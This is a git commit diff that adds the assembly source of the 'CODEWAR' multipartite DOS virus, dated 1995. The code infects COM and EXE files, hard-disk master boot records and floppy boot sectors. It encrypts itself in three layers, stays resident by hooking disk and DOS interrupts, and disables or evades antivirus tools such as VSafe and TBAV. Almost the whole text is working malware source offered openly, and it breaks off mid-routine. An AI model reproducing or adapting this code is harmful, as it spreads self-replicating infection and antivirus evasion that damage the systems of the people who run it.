initial push of all stuff :)
diff --git a/Papers/codewar.txt b/Papers/codewar.txt
new file mode 100644 (file)
index 0000000..5b80d4a
--- /dev/null
@@ -0,0 +1,1732 @@
+;-------------------------------------------------------------------------\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;                        C O D E W A R  V i r u s\r
+;\r
+;\r
+;                   Programming by Sirius & Mindmaniac\r
+;\r
+;\r
+;                             Germany 1995.\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;---------------------------------------------------------------------------\r
+;\r
+;\r
+;\r
+;  Please note:\r
+; --------------\r
+;\r
+;  This programme introduces into the technique of multipartite viruses.\r
+;  Pass to responsible people only!\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;   Features:\r
+; -------------\r
+;\r
+;  - Infection Type: - COM files,\r
+;                    - EXE files\r
+;                    - Master Boot Record (MBR) on Hard Disk Drives\r
+;                    - Boot Sector (BS) on Floppy Disk Drives\r
+;                      ( 1.44 Mb + 1.2 Mb )\r
+;\r
+;\r
+;  - Encryption:     3-layer-enryption (generic)\r
+;\r
+;  - Memory resident (Bootsector virus technique)\r
+;\r
+;  - Retro features.\r
+;\r
+;  - Similarities:   Alive (File Virus), Junkie (Multipartite Virus)\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;  Additional Notes:\r
+; -------------------\r
+;\r
+;  Infected objects are not detected by SSC Anti-Virus Scanner and\r
+;  Analyzer.\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+Ofs             equ     Offset\r
+Cmt             equ     Comment\r
+B               equ     byte ptr\r
+W               equ     word ptr\r
+\r
+Directory       STRUC\r
+DS_Drive        db ?\r
+DS_File_Name    db 8 dup(0)\r
+DS_File_Ext     db 3 dup(0)\r
+DS_File_Attr    db ?\r
+DS_Reserved     db 10 dup(0)\r
+DS_Time         dw ?\r
+DS_Date         dw ?\r
+DS_Start_Clust  dw ?\r
+DS_File_Size    dd ?\r
+Directory       ENDS\r
+\r
+FCB             STRUC\r
+FCB_Drive       db ?\r
+FCB_File_Name   db 8 dup(0)\r
+FCB_File_Ext    db 3 dup(0)\r
+FCB_Block       dw ?\r
+FCB_Rec_Size    dw ?\r
+FCB_File_Size   dd ?\r
+FCB_File_Date   dw ?\r
+FCB_File_Time   dw ?\r
+FCB_Reserved    db 8 dup(0)\r
+FCB_Record      db ?\r
+FCB_Random      dd ?\r
+FCB             ENDS\r
+\r
+DTA             STRUC\r
+DTA_Reserved    db 21 dup(0)\r
+DTA_File_Attr   db ?\r
+DTA_File_Time1  db ?                    ; = seconds\r
+DTA_File_Time2  db ?\r
+DTA_File_Date   dw ?\r
+DTA_File_Size   dd ?\r
+DTA_File_Name   db 13 dup(0)\r
+DTA             ENDS\r
+\r
+SFT             STRUC\r
+SFT_Reserved1   dw ?    ; 0\r
+SFT_Open_Mode   dw ?    ; 2\r
+SFT_File_Attr   db ?    ; 4\r
+SFT_Reserved2   dw ?    ; 5\r
+SFT_Reserved3   dd ?    ; 7\r
+SFT_Reserved4   dw ?    ; 11\r
+SFT_File_Time   dw ?    ; 13\r
+SFT_File_Date   dw ?    ; 15\r
+SFT_File_SizeLo dw ?    ; 17\r
+SFT_File_SizeHi dw ?    ; 19\r
+SFT_Curr_OfsLo  dw ?    ; 21\r
+SFT_Curr_OfsHi  dw ?    ; 23\r
+SFT_Reserved7   dw ?    ; 25\r
+SFT_Reserved8   dd ?    ; 27\r
+SFT_Reserved9   db ?    ; 31\r
+SFT_File_Name   db 8 dup(?)     ; 32 = 20h\r
+SFT_File_Ext    db 3 dup(?)     ; 40 = 28h\r
+SFT             ENDS\r
+\r
+ExeH            STRUC\r
+Buf_0h          dw 0    ; "MZ" oder "ZM" (selten)\r
+Buf_2h          dw 0    ; Last page size\r
+Buf_4h          dw 0    ; Size in pages\r
+Buf_6h          dw 0\r
+Buf_8h          dw 0\r
+Buf_ah          dw 0\r
+Buf_ch          dw 0\r
+Buf_eh          dw 0    ; SS\r
+Buf_10h         dw 0    ; SP\r
+Buf_12h         dw 0    ; CheckSum\r
+Buf_14h         dw 0    ; IP\r
+Buf_16h         dw 0    ; CS\r
+Buf_18h         dw 0    ; WINDOWS Marker\r
+ExeH            ENDS\r
+\r
+\r
+\r
+Flag_Exec_Infection     equ     1\r
+\r
+ofs                     equ     offset\r
+cmt                     equ     comment\r
+\r
+Reloc                   =       ofs Vir_Start\r
+Camouf                  =       2\r
+Enc_Word_Length         =       (Virus_Length/2)+1\r
+Virus_Length            =       4*512\r
+Header_Length           =       18h\r
+\r
+File_Type_COM           =       byte (Restore_COM-File_Type)-2\r
+File_Type_EXE           =       byte (Restore_EXE-File_Type)-2\r
+\r
+Media_Descriptor_144    =       0F0h\r
+Media_Descriptor_120    =       0F9h\r
+\r
+Vir_Len_Sectors         =       4\r
+\r
+Vir_Harddisk_Track      =       0\r
+Vir_Harddisk_Head       =       0\r
+Vir_Harddisk_Sector     =       4\r
+\r
+Vir_Floppy_120_Track    =       79\r
+Vir_Floppy_120_Head     =       1\r
+Vir_Floppy_120_Sector   =       6\r
+\r
+Vir_Floppy_144_Track    =       79\r
+Vir_Floppy_144_Head     =       1\r
+Vir_Floppy_144_Sector   =       15\r
+\r
+\r
+Names_HDD_Track         =       0\r
+Names_HDD_Head          =       0\r
+Names_HDD_Sector        =       3\r
+\r
+\r
+; in bytes\r
+\r
+F_Min_LengthCOM         =       3000\r
+F_Max_LengthCOM         =       50000\r
+\r
+; in pages\r
+\r
+F_Min_LengthEXE         =       6               ; = 3 kb\r
+F_Max_LengthEXE         =       2000            ; = 1000 kb\r
+\r
+\r
+Time_Stamp              =       13\r
+TOM_Decrement_value     =       5\r
+\r
+\r
+        .286\r
+CODE    SEGMENT BYTE PUBLIC 'CODE'\r
+ASSUME  CS:CODE,DS:CODE,ES:NOTHING,SS:NOTHING\r
+        ORG     0100h\r
+\r
+\r
+Sample:\r
+        jmp     Vir_Start\r
+\r
+;----------------------------------------------------------------------------\r
+; allways start at seg:0000\r
+\r
+        org     100h+ 1*16\r
+;----------------------------------------------------------------------------\r
+\r
+Vir_Start:\r
+\r
+;----------------------------------------------------------------------------\r
+; 1st encryption layer (outer)\r
+;----------------------------------------------------------------------------\r
+                cld\r
+                mov     CX,Enc_Word_Length\r
+\r
+                MOV     bp,1234h\r
+                ORG     $-2\r
+E1_Idx_Val      dw      ofs E1_Encrypted_Code\r
+\r
+                mov     ax,1234h\r
+                ORG     $-2\r
+E1_Key_Val      dw      0\r
+\r
+                db      081h,3eh\r
+E1_Dec_Loop:\r
+                XOR     Word Ptr cs:[bp],ax\r
+\r
+                inc     bp\r
+                inc     bp\r
+\r
+                dec     cx\r
+\r
+                or      cx,cx\r
+                jz      E1_Loop_done\r
+\r
+                jmp     short E1_Dec_Loop\r
+                db      09ah                    ;=CALL FAR\r
+E1_Loop_done:\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+E1_Encrypted_Code:\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; 2nd encryption layer (inner)\r
+;----------------------------------------------------------------------------\r
+                mov     cx,(Enc_Word_Length/2) +1\r
+\r
+                MOV     si,1234h\r
+                ORG     $-2\r
+E2_Idx_Val      dw      ofs E2_Encrypted_Code\r
+\r
+                mov     ax,1234h\r
+                ORG     $-2\r
+E2_Key_Val_1    dw      0\r
+\r
+                mov     bx,1234h\r
+                ORG     $-2\r
+E2_Key_Val_2    dw      0\r
+\r
+E2_Dec_Loop:\r
+                xor     w cs:[si],ax\r
+                inc     si\r
+                inc     si\r
+\r
+                xor     w cs:[si],bx\r
+                inc     si\r
+                inc     si\r
+\r
+                loop    short E2_Dec_Loop\r
+\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+E2_Encrypted_Code:\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; 3rd encryption layer (innerst)\r
+;----------------------------------------------------------------------------\r
+                mov     cx,(Enc_Word_Length/3)+1\r
+\r
+                MOV     si,1234h\r
+                ORG     $-2\r
+E3_Idx_Val      dw      ofs E3_Encrypted_Code\r
+\r
+                mov     ax,1234h\r
+                ORG     $-2\r
+E3_Key_Val_1    dw      0\r
+\r
+                mov     bx,1234h\r
+                ORG     $-2\r
+E3_Key_Val_2    dw      0\r
+\r
+                mov     dx,1234h\r
+                ORG     $-2\r
+E3_Key_Val_3    dw      0\r
+\r
+E3_Dec_Loop:\r
+                xor     w cs:[si],ax\r
+                inc     si\r
+                inc     si\r
+\r
+                xor     w cs:[si],bx\r
+                inc     si\r
+                inc     si\r
+\r
+                xor     w cs:[si],dx\r
+                inc     si\r
+                inc     si\r
+;Chg1+2\r
+                add     ax,1234h\r
+                ORG     $-2\r
+E3_Key_Change_1 dw      0\r
+\r
+                add     bx,1234h\r
+                ORG     $-2\r
+E3_Key_Change_2 dw      0\r
+\r
+                loop    short E3_Dec_Loop\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+E3_Encrypted_Code:\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+        cld\r
+        mov     ax,cs\r
+        or      ax,ax\r
+        jnz     Run_file\r
+        jmp     Its_boottime\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; Restore program-header, the registers and go back to the program\r
+\r
+Exit_File:\r
+                pop     es ds\r
+\r
+\r
+                db      0EBh                    ; JMP-short-opcode\r
+File_Type       db      File_Type_COM\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; restore the COM-host-file\r
+\r
+Restore_COM:\r
+        MOV     DI,100h\r
+        push    di\r
+\r
+        MOV     Word Ptr cs:[DI],1234h\r
+        ORG     $-2\r
+Rest1   dw      0c3c3h\r
+\r
+        MOV     byte Ptr cs:[DI+2],12h\r
+        ORG     $-1\r
+Rest2   db      0c3h\r
+\r
+ZeroRegsForHost:\r
+        mov     cx,8\r
+nullup: push    0\r
+        loop    nullup\r
+        popa\r
+\r
+        ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; restore the EXE-host-file\r
+\r
+Restore_EXE:\r
+        mov     ax,ds                           ; DS = PSP !\r
+        add     ax,10h                          ; + 100h bytes of PSP\r
+        add     cs:[bx+ofs Old_CS -Reloc],ax    ; = new CS\r
+        add     ax,0000                         ; + old SS\r
+        org     $-2\r
+Old_SS  dw      ?\r
+        cli\r
+        mov     ss,ax                           ; set SS\r
+        mov     sp,0000                         ; set SP\r
+        org     $-2\r
+Old_SP  dw      ?\r
+        sti\r
+\r
+        call    ZeroRegsForHost\r
+\r
+        db      0EAh                            ; = JMP Old_CS:Old_IP\r
+\r
+; In an EXE - header-values are stored here\r
+\r
+Old_ExeValues:\r
+Old_IP          dw      0\r
+Old_CS          dw      0\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+        db      " PSYCHo-TECH GMBH 1995 "\r
+\r
+;----------------------------------------------------------------------------\r
+Run_File:\r
+\r
+; relocate\r
+        CALL    Delta\r
+Delta:\r
+        POP     BX\r
+        SUB     BX,1234h\r
+        ORG     $-2\r
+        dw      ofs Delta -Reloc\r
+\r
+; save PSP\r
+        push    ds es\r
+\r
+\r
+; assume segments\r
+        push    cs cs\r
+        pop     ds es\r
+\r
+; prepare the retf to Exit_File\r
+\r
+        push    cs\r
+        lea     ax,cs:[bx+ofs Exit_File -Reloc]\r
+        push    ax\r
+\r
+; change CS, so we start at ofs 0 not 100h\r
+\r
+        mov     ax,cs\r
+        SHR     BX,4\r
+        ADD     AX,BX\r
+        PUSH    AX\r
+        MOV     AX,ofs Continue -Reloc\r
+        PUSH    AX\r
+        RETF\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Gag:\r
+        push    ax ds\r
+        in      al,40h\r
+        test    al,1\r
+        jz      Skip_Gag\r
+\r
+        mov     ax,0b800h\r
+        mov     ds,ax\r
+        mov     word ptr ds:[(79*2)],00cf9h     ;= lightred point "ù"\r
+Skip_Gag:\r
+        pop     ds ax\r
+        ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Its_boottime:\r
+\r
+        call    Gag\r
+\r
+        xor     di,di\r
+        MOV     DS,DI\r
+\r
+        mov     si,7c00h+512\r
+\r
+; decrement RAM by xx kB\r
+\r
+        SUB     Word Ptr DS:[0413h],TOM_Decrement_value\r
+        MOV     AX,DS:[0413h]\r
+        MOV     BX,40h\r
+        MUL     BX\r
+        MOV     ES,AX\r
+\r
+; move virus to TOM (xxxx bytes)\r
+\r
+        MOV     CX,Virus_Length\r
+        CLD\r
+        REPZ    MOVSB\r
+\r
+; set new INT 13h and 1Ch\r
+\r
+        CLI\r
+\r
+        MOV     SI,4*13h\r
+        MOV     DI,ofs Old_Int_13 -Reloc\r
+        MOV     AX,ofs New_Int_13 -Reloc\r
+        CALL    Get_Set_Int\r
+\r
+        MOV     Byte Ptr ES:[ofs Got_Int_21 -Reloc],0\r
+\r
+        MOV     SI,4*1ch\r
+        MOV     DI,ofs Old_Int_1c -Reloc\r
+        MOV     AX,ofs New_Int_1c -Reloc\r
+        CALL    Get_Set_Int\r
+\r
+        STI\r
+\r
+; save INT 21h\r
+\r
+        MOV     DI,ofs Old_Int_21 -Reloc\r
+        MOV     SI,4*21h\r
+        MOVSW\r
+        MOVSW\r
+\r
+        mov     di,7c00h\r
+\r
+; prepare RETF to orig PAR/BS\r
+\r
+        PUSH    CS      ;=0\r
+        PUSH    DI      ;=7c00h\r
+\r
+        push    es\r
+        push    ofs Boot_Finish -Reloc\r
+\r
+        PUSH    CS\r
+        POP     ES\r
+\r
+; restore the JUMP-Word and the patched PAR/BS\r
+\r
+        MOV     SI,7c00h + 512 + BS_First_word -Reloc\r
+        MOVSW\r
+\r
+        mov     di,7c00h + 60h   ; offset of the patch-area\r
+        CALL    Call_Move_20\r
+\r
+; Patch the TBAV immunized partition\r
+\r
+        cmp     w cs:[7c00h+0dfh],"hT"\r
+        jne     no_TB_partition\r
+        mov     b cs:[7c00h+73h],0\r
+\r
+no_TB_partition:\r
+\r
+; goto Boot_Finish / infect C:\r
+\r
+        retf\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+New_Int_13:\r
+\r
+        cmp     ax,0201h                        ; reading ?\r
+        JNZ     Jump_Old_Int_13\r
+\r
+        CMP     CX,0001h                        ; sector 1 and Track 0 ?\r
+        JNZ     Jump_Old_Int_13\r
+\r
+        or      dh,dh                           ; head 0 ?\r
+        jnz     Jump_Old_Int_13\r
+\r
+        pusha\r
+        PUSH    DS\r
+        PUSH    ES\r
+\r
+        CALL    Int13_Works\r
+\r
+        POP     ES\r
+        POP     DS\r
+        popa\r
+\r
+Jump_Old_Int_13:\r
+        jmp     dword ptr cs:(ofs Old_Int_13 -Reloc)\r
+\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Old_Int_13:\r
+        PUSHF\r
+        call    dword ptr cs:(ofs Old_Int_13 -Reloc)\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+        db      " >>> BRAVEd DANGER 4 BRAVE PEOPLe <<< "\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Continue:\r
+        PUSH    DS\r
+        PUSH    ES\r
+\r
+        XOR     AX,AX\r
+        MOV     DS,AX\r
+\r
+        PUSH    CS\r
+        POP     ES\r
+\r
+; save int 13h\r
+\r
+        MOV     DI,ofs Old_Int_13 -Reloc\r
+        MOV     SI,4*13h\r
+        CLD\r
+        MOVSW\r
+        MOVSW\r
+        JMP     Short Read_Drive_C\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Boot_Finish:\r
+        PUSH    DS\r
+        PUSH    ES\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Read_Drive_C:\r
+        MOV     AH,02h\r
+        MOV     DL,80h\r
+\r
+        CALL    Int13_Works     ; infect drive C\r
+\r
+        POP     ES\r
+        POP     DS\r
+\r
+        XOR     AX,AX\r
+        XOR     BX,BX\r
+        retf\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Int13_Works:\r
+\r
+        PUSH    CS\r
+        POP     DS\r
+        PUSH    CS\r
+        POP     ES\r
+\r
+        CALL    Read_or_Write_BS_from_A\r
+        jnb     oky                             ; Goto_Ret\r
+        jmp     Goto_Ret\r
+oky:\r
+\r
+\r
+        MOV     DI,ofs Buffer + 60h -Reloc\r
+\r
+; check if BS is infected\r
+\r
+        CMP     Word Ptr [SI],05EEBh    ; SI=@buffer\r
+        JNZ     BS_not_infected\r
+\r
+        CMP     Word Ptr [DI],0FF33h    ; == xor di,di\r
+        JZ      Goto_Ret\r
+\r
+BS_not_infected:\r
+\r
+; test if it is Harddisk or floppy\r
+\r
+        cmp     dl,79h\r
+        ja      Not_Floppy\r
+\r
+\r
+; test if HD 1.44 (=F0) or HD 1.2 (=F9) floppy\r
+\r
+        CMP     Byte Ptr DS:[ofs Buffer+15h -Reloc],Media_Descriptor_144\r
+        JZ      Found_ID_F0\r
+\r
+        CMP     Byte Ptr DS:[ofs Buffer+15h -Reloc],Media_Descriptor_120\r
+        JNZ     Goto_Ret\r
+\r
+Large_floppy:\r
+        MOV     CL,Vir_Floppy_120_Sector\r
+        JMP     Short Floppy_Disk\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; 1.44 floppy found\r
+\r
+Found_ID_F0:\r
+        MOV     AX,40h\r
+        MOV     DS,AX\r
+\r
+; 0:490h == AT Drive 0 status\r
+\r
+        CMP     Byte Ptr DS:[0090h],97h\r
+        JZ      Large_Floppy\r
+\r
+; it is 1.44 Mb\r
+\r
+        MOV     CL,Vir_Floppy_144_Sector\r
+\r
+Floppy_Disk:\r
+        PUSH    CS\r
+        POP     DS\r
+\r
+        MOV     CH,Vir_Floppy_120_Track\r
+        JMP     Short Head_01\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Not_floppy:\r
+        MOV     CX,Vir_Harddisk_Sector\r
+        JMP     Short Head_00\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Head_01:\r
+        MOV     DH,Vir_Floppy_120_Head\r
+Head_00:\r
+        MOV     DS:[ofs Ptc_CX -Reloc],CX   ; patch the PAR\r
+        MOV     DS:[ofs Ptc_DX -Reloc],DX\r
+\r
+        PUSH    DX\r
+        PUSH    CX\r
+        PUSH    SI\r
+        PUSH    DI\r
+\r
+; Move the JMP-Op to the beginning of BS/PAR\r
+\r
+        MOV     DI,ofs BS_first_word -Reloc     ; SI=ofs buffer\r
+        MOVSW\r
+        POP     SI\r
+\r
+        CALL    Call_Move_20\r
+\r
+        MOV     SI,DI\r
+        POP     DI\r
+        MOVSW\r
+\r
+        add     di,60h-2\r
+        CALL    Call_Move_20                    \r
+\r
+; write BS\r
+\r
+        MOV     AX,0301h\r
+        PUSH    AX\r
+        CALL    Read_or_Write_BS_from_A\r
+\r
+        POP     AX\r
+        POP     CX\r
+        POP     DX\r
+\r
+        MOV     AL,Vir_Len_Sectors\r
+        MOV     BX,ofs Buffer -Reloc\r
+        JB      Goto_Ret\r
+\r
+\r
+        MOV     Word Ptr DS:[ofs E1_Idx_Val -Reloc],7c00h +512+E1_Encrypted_Code -Reloc -Camouf\r
+        MOV     Word Ptr DS:[ofs E2_Idx_Val -Reloc],7c00h +512+E2_Encrypted_Code -Reloc\r
+        MOV     Word Ptr DS:[ofs E3_Idx_Val -Reloc],7c00h +512+E3_Encrypted_Code -Reloc\r
+\r
+\r
+        CALL    Encrypt_Virus\r
+\r
+        CALL    Call_Old_Int_13\r
+Goto_Ret:\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; read the PAR/BS from drive\r
+;----------------------------------------------------------------------------\r
+\r
+Read_or_Write_BS_from_A:\r
+        MOV     AL,01h\r
+        MOV     CX,0001h\r
+        MOV     DH,0\r
+        MOV     BX,ofs Buffer -Reloc\r
+        MOV     SI,BX\r
+\r
+        PUSH    DX\r
+        CALL    Call_Old_Int_13\r
+        POP     DX\r
+\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Call_Move_20:\r
+        MOV     CX,32\r
+        CLD\r
+        REPZ    MOVSb\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Get_Set_Int:\r
+\r
+        PUSH    SI\r
+        MOVSW\r
+        MOVSW\r
+        POP     SI\r
+        MOV     [SI],AX\r
+        MOV     [SI+2],ES\r
+        RET\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Get_Random:\r
+\r
+;;        xor     ax,ax\r
+;;        ret\r
+\r
+        push    cx dx\r
+\r
+        in      al,40h\r
+        mov     cl,al\r
+\r
+        xor     ax,ax\r
+        int     1ah\r
+\r
+        in      al,40h\r
+        mov     ah,al\r
+\r
+        in      al,40h\r
+        rol     ax,cl\r
+\r
+        pop     dx cx\r
+        ret\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;============================================================================\r
+Encrypt_Virus:\r
+\r
+        pusha\r
+        push    ds es\r
+\r
+; get (random) key-values\r
+\r
+; L1\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E1_Key_Val -Reloc],ax\r
+\r
+; L2\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E2_Key_Val_1 -Reloc],ax\r
+\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E2_Key_Val_2 -Reloc],ax\r
+\r
+; L3\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E3_Key_Val_1 -Reloc],ax\r
+\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E3_Key_Val_2 -Reloc],ax\r
+\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E3_Key_Val_3 -Reloc],ax\r
+\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E3_Key_Change_1 -Reloc],ax\r
+\r
+        call    Get_Random\r
+        MOV     word ptr cs:[ofs E3_Key_Change_2 -Reloc],ax\r
+\r
+\r
+; move bytes\r
+\r
+        PUSH    CS\r
+        POP     ES\r
+\r
+        MOV     SI,1234h\r
+        org     $-2\r
+        dw      0\r
+\r
+        MOV     DI,ofs Buffer -Reloc\r
+        MOV     CX,(ofs Encrypted_Code_End - ofs Vir_Start)\r
+        REPZ    MOVSB\r
+\r
+\r
+; fill\r
+\r
+        pusha\r
+        mov     cx,2*80\r
+Fill_random:\r
+        in      al,40h\r
+        cld\r
+        stosb\r
+        loop    Fill_random\r
+        popa\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; encrypt innerst layer E3\r
+\r
+        MOV     w ax,cs:[ofs E3_Key_Val_1 -Reloc]\r
+        MOV     w bx,cs:[ofs E3_Key_Val_2 -Reloc]\r
+        MOV     w dx,cs:[ofs E3_Key_Val_3 -Reloc]\r
+\r
+;chg1+2\r
+        MOV     w di,cs:[ofs E3_Key_Change_1 -Reloc]\r
+        MOV     w bp,cs:[ofs E3_Key_Change_2 -Reloc]\r
+\r
+        MOV     si,ofs Buffer -Reloc\r
+        ADD     si,ofs E3_Encrypted_Code -Reloc\r
+\r
+        MOV     CX,(Enc_Word_Length/3) +1\r
+\r
+C3_Enc_Loop:\r
+        XOR     cs:[si],ax\r
+        INC     si\r
+        INC     si\r
+\r
+        XOR     cs:[si],bx\r
+        INC     si\r
+        INC     si\r
+\r
+        XOR     cs:[si],dx\r
+        INC     si\r
+        INC     si\r
+;chg1\r
+        add     ax,di\r
+;chg2\r
+        add     bx,bp\r
+\r
+        LOOP    C3_Enc_Loop\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; encrypt inner layer E2\r
+\r
+        MOV     w ax,cs:[ofs E2_Key_Val_1 -Reloc]\r
+        MOV     w bx,cs:[ofs E2_Key_Val_2 -Reloc]\r
+\r
+        MOV     si,ofs Buffer -Reloc\r
+        ADD     si,ofs E2_Encrypted_Code -Reloc\r
+\r
+        MOV     CX,(Enc_Word_Length/2) +1\r
+\r
+C2_Enc_Loop:\r
+        XOR     cs:[si],ax\r
+        INC     si\r
+        INC     si\r
+\r
+        XOR     cs:[si],bx\r
+        INC     si\r
+        INC     si\r
+\r
+        LOOP    C2_Enc_Loop\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+; encrypt outer layer E1\r
+\r
+        MOV     word ptr bx,cs:[ofs E1_Key_Val -Reloc]\r
+\r
+        MOV     DI,ofs Buffer -Reloc\r
+        ADD     DI,ofs E1_Encrypted_Code -Reloc\r
+\r
+        MOV     CX,Enc_Word_Length\r
+\r
+Enc_Loop:\r
+        XOR     cs:[DI],BX\r
+        INC     DI\r
+        INC     DI\r
+        LOOP    Enc_Loop\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+Mult_POP:\r
+        pop     es ds\r
+        popa\r
+\r
+        RET\r
+;============================================================================\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+New_Int_1c:\r
+        CMP     Byte Ptr CS:[ofs Got_Int_21 -Reloc],1\r
+        JZ      Jump_Int_1c\r
+\r
+        pusha\r
+        push    ds es\r
+\r
+        MOV     SI,4*21h\r
+        XOR     AX,AX\r
+        MOV     DS,AX\r
+\r
+; load int 20h seg and compare if below 800h\r
+\r
+        MOV     AX,DS:[4*20h +2]\r
+\r
+        CMP     AX,0000h\r
+        JZ      Exit_Int_1c\r
+\r
+        CMP     AX,800h\r
+        JA      Exit_Int_1c\r
+\r
+; cmp with int 21h seg\r
+\r
+        CMP     [SI+02h],AX\r
+        JNZ     Exit_Int_1c\r
+\r
+; cmp with int 27h seg\r
+\r
+        CMP     DS:[4*27h +2],AX\r
+        JNZ     Exit_Int_1c\r
+\r
+; cmp with int 2Fh seg\r
+\r
+        CMP     DS:[4*2Fh +2],AX\r
+        JNZ     Exit_Int_1c\r
+\r
+; ok, now hook int 21h\r
+\r
+        CLI\r
+        MOV     DI,ofs Old_Int_21 -Reloc\r
+        PUSH    CS\r
+        POP     ES\r
+        MOV     AX,ofs New_Int_21 -Reloc\r
+        CALL    Get_Set_Int\r
+\r
+; set the flag for it\r
+        MOV     Byte Ptr CS:[ofs Got_Int_21 -Reloc],01h\r
+        STI\r
+\r
+; get int 2f vector\r
+\r
+        push    0\r
+        pop     ds\r
+        mov     w ax,ds:[4*2fh]\r
+        mov     w cs:[ofs Old_Int_2f -Reloc],ax\r
+        mov     w ax,ds:[4*2fh+2]\r
+        mov     w cs:[ofs Old_Int_2f -Reloc+2],ax\r
+\r
+\r
+\r
+Exit_Int_1c:\r
+\r
+        pop     es ds\r
+        popa\r
+\r
+Jump_Int_1c:\r
+        jmp     dword ptr cs:(ofs Old_int_1c -Reloc)\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+New_Int_21:\r
+\r
+\r
+IF      Flag_Exec_Infection\r
+        CMP     AX,4B00h\r
+        JZ      Control_Operation\r
+ENDIF\r
+\r
+\r
+        CMP     AH,3Dh\r
+        JZ      Control_Operation\r
+\r
+Exit_Int_21:\r
+        jmp     dword ptr cs:(ofs Old_Int_21 -Reloc)\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+;----------------------------------------------------------------------------\r
+Control_Operation:\r
+\r
+        pusha\r
+        push    ds es\r
+\r
+Not_Ext_Open:\r
+        xchg    ax,cx\r
+        xor     ax,ax\r
+\r
+        call    Deinstall_Vsafe\r
+\r
+; Hook int 24h\r
+\r
+        PUSH    DS\r
+        MOV     DS,AX\r
+        LES     AX,DS:[4*24h]\r
+        MOV     Word Ptr DS:[4*24h], ofs New_Int_24 -Reloc\r
+        MOV     DS:[4*24h +2],CS\r
+        POP     DS\r
+\r
+        PUSH    ES\r
+        PUSH    AX\r
+\r
+; open file\r
+\r
+        MOV     AX,3D00h\r
+        call    Call_Old_Int21\r
+        jb      File_Error\r
+\r
+        mov     bx,ax\r
+\r
+        PUSH    CS\r
+        POP     DS\r
+\r
+; get SFT\r
+\r
+        PUSH    BX\r
+        MOV     AX,1220h\r
+        call    Call_Old_Int2F                 ; INT     2Fh\r
+\r
+        MOV     AX,1216h\r
+        MOV     BL,ES:[DI]\r
+        call    Call_Old_Int2F                 ; INT     2Fh\r
+        POP     BX\r
+\r
+        JB      Close_Exit\r
+\r
+; skip AV-programs ?\r
+\r
+        call    Check_If_AV_Name\r
+        jz      goto_close_exit\r
+\r
+\r
+; test if executable-file\r
+\r
+        CMP     Word Ptr ES:[DI+28h],"OC"\r
+        JZ      Is_COM\r
+\r
+        CMP     Word Ptr ES:[DI+28h],"XE"\r
+        JZ      Is_EXE\r
+\r
+goto_close_exit:\r
+        JMP     Short Close_Exit\r
+;----------------------------------------------------------------------------\r
+\r
+\r
+\r
